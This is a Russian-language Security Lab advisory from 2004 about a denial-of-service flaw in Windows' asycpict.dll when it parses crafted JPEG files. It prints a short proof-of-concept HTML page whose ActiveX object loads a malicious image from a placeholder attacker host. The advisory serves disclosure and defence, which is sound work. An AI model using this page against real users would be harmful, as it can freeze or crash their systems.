Security Lab

Отказ в обслуживании в Microsoft Windows

Дата публикации:18.10.2004
Всего просмотров:1787
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Windows (All versions)

Описание:
Уязвимость обнаружена в Microsoft Windows. Удаленный атакующий может вызвать отказ в обслуживании или выполнить произвольный код.

Уязвимость обнаружена в 'asycpict.dll' при обработке JPEG файла. Удаленный атакующий с помощью специально сформированной HTML страницы и JPEG файла может вызвать отказ в обслуживании. Пример:

<HTML>
< HEAD>
< TITLE>Think of something clever!</TITLE>
< /HEAD>
< BODY>
< OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
< PARAM NAME="BorderStyle" VALUE="0">
< PARAM NAME="SizeMode" VALUE="3">
< PARAM NAME="Size" VALUE="2540;2540">
< PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg">
< PARAM NAME="PictureAlignment" VALUE="0">
< PARAM NAME="VariousPropertyBits" VALUE="19">
< /OBJECT>
< /BODY>
< /HTML>

URL производителя: www.microsoft.com

Решение: Решение не существует на данный момент

Ссылки: Microsoft asycpict.dll 1.0 Remote JPEG DoS Attack Vulnerability